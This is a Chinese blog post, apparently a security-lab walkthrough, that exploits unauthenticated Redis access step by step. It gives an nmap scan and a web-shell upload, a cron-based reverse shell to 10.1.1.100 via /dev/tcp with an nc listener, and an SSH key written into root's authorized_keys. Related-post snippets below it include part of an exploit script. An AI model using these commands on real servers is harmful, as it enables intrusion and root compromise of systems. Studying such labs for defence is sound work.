Redis未授权访问

已于 2022-08-18 15:30:54 修改
阅读量3.7k 收藏 8
点赞数 2
文章标签: redis 数据库 kali 网络安全
于 2021-12-03 16:14:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_43397796/article/details/121701085
版权

Redis 未授权访问 漏洞利用 反弹shell 网络安全
关键词由优快云通过智能技术生成

Redis未授权访问

试验地址

实验:Redis未授权访问漏洞(合天网安实验室)

实验步骤

1. redis创建shell文件

  1. 首先先下载工具包wget http://tools.hetianlab.com/tools/RedisUnauthorized.zip

  2. 解压unzip RedisUnauthorized.zip

  3. tar -zxvf redis-6.0.3.tar.gz

  4. 移动到redis文件夹下,make

  5. 移动到/redis/src 将redis-cli复制到/usr/bin目录下 cp redis-cli /usr/bin

  6. nmap扫描目标nmap -sS -Pn -p- -T4 10.1.1.200

  7. 发现端口22,80,5902,6002,6379

在这里插入图片描述

  1. 使用dirsearch扫描敏感目录

在这里插入图片描述

敏感信息泄漏

在这里插入图片描述

  1. 连接靶机redis,发现存在未授权访问``

在这里插入图片描述

  1. 上传一句话木马

在这里插入图片描述

  1. 使用蚁剑连接

在这里插入图片描述

2. redis写定时任务反弹shell

  1. Kali使用nc开启监听nc -lvvp 4444
  2. 设置写入的内容,在计划任务前后加入换行(\n)以确保写入的计划任务可以被正常解析,每分钟执行一次/bin/bash -i >& /dev/tcp/10.1.1.100/4433 0>&1set xx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.100:4444 0>&1\n\n"
  3. 设置备份路径config set dir /var/spool/cron
  4. 设置备份文件名config set dbfilename root
  5. save

成功获取shell

在这里插入图片描述

3. redis写入ssh公钥获取shell

  1. 生成公钥ssh-keygen -t rsa

  2. 将公钥写入foo.txt文件,前后用\n换行,避免和Redis其他缓存数据混合(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

  3. 将foo.txt写靶机cat /tmp/foo.txt | redis-cli -h 10.1.1.200 -p 6379 -x set sshkey

  4. 设置备份路径config set dir /root/.ssh/

  5. 设置上传公钥的备份文件名字为**authorized_keys **config set dbfilename "authorized_keys"

  6. save

  7. ssh root@10.1.1.200 -i /root/.ssh/id_rsa

在这里插入图片描述

神丶上单
关注
redis未授权访问
m0_56578216的博客
09-02 1000
前提条件:1.
redis未授权漏洞利用脚本
qq_42529356的博客
02-14 727
#! /usr/bin/env python # _*_ coding:utf-8 _*_ import socket import sys import os class PAYLOAD(object): def __init__(self,ip,port,timeout): self.ip=ip self.port=port self.timeout=timeout self.PASSWORD_DIC=['redis','ro
redis未授权访问全漏洞复现
qq_46343633的博客
01-19 2977
Redis 全称 Remote DictionaryServer(即远程字典服务),它是一个基于内存(当然也可以把其存储至硬盘上,这也是写shell的必要条件之一)实现的键值型非关系(NoSQL)数据库Redis 免费开源,其最新稳定版本是 6.2.x(2022/11/10)。常用版本包括3.0、4.0、5.0。自 Redis 诞生以来,它以其超高的性能、完美的文档和简洁易懂的源码广受好评,国内外很多大型互联网公司都在使用 Redis,比如腾讯、阿里、Twitter、Github 等等。
Redis 未授权访问漏洞(附Python脚本)
09-21 845

 0x01 环境搭建
 
 #下载并安装
 cd /tmp
 wget http://download.redis.io/releases/redis-2.8.17.tar.gz
 tar xzf redis-2.8.17.tar.gz
 cd redis-2.8.17
 make
 #启动redis服...
攻防_漏洞_Redis未授权
redglare的博客
01-11 2114
原文链接:http://www.cnblogs.com/bmjoker/p/9548962.html 一、漏洞简介以及危害: 1.什么是redis未授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在
Redis未授权访问漏洞复现
yangbz123的博客
01-29 4663
Redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新
关于Redis未授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未...
unauthorized-check:扫描常见未授权访问redis,mongodb,memcached,elasticsearch,zookeeper,ftp,CouchDB,docker,Hadoop)
03-08
未经授权的检查 扫描以下常见未授权访问 redis、mongodb、memcached、elasticsearch、zookeeper、ftp、CouchDB、docker、Hadoop 安装 pip3 install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple/ 使用说明 python3 unauthorized-check.py url.txt
Redis未授权访问漏洞验证脚本编写(POC)
Mrs_H的博客
04-11 1690
Redis未授权访问漏洞验证脚本编写(POC) 1.实验环境: Ubuntu18(靶机) kali linux(攻击机) 2.代码的编写: import sys import getopt import socket def url_exec(url):#将要探测的主机地址都存入一个待测数组内 ans = [] group = [] li = url.split(".") if (url.find('-') == -1): group.append(url
Redis未授权访问利用总结
2ed
10-09 1740
漏洞概述 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞...
Redis 未授权访问漏洞与getshell(附getshell检测工具)
告白的博客
02-24 4320
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的未授权范围与Pickle反序列化
Redis未授权访问漏洞的利用姿势
chengman3837的博客
12-30 425
本文来自:i春秋社区 0x01 Redis简介 redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,当然可以把其存储至硬盘上。项目中使用redis做任务队列的存储器可以很容易实现分布式,另外也开始流行使用redis作为session的存储器来替换传统的文件方式。在...
Redis未授权访问漏洞复现与工具安装
Welcome To Myon'Blog !
01-11 3007
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis未授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
【漏洞复现】---- Redis 4.x/5.x 未授权访问漏洞
qq_43168364的博客
12-24 1358
一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库Redis提供了多种语言的API。Redis默认使用6379端口 Redis未授权漏洞产生的原因 ---- Redis默认使用6379端口,并且Redis默认是空密码并且默认允许远程连接。一些管理员在安装好Redis之后,并没有修改它的默认端口。而且也没有设置密码的话,黑客就可以通过Redis数据库写入任意文件进行提权,从而操控该服务器。 Redis未授权访问在4.x/5.0.5以前
redis未授权访问漏洞
最新发布
01-10
### Redis 未授权访问漏洞解决方案与预防方法 #### 检测 Redis 未授权访问漏洞 为了有效检测 Redis 实例是否存在未授权访问漏洞,可以采取以下措施: - **网络扫描工具**:使用 Nmap 或其他类似的网络安全扫描工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值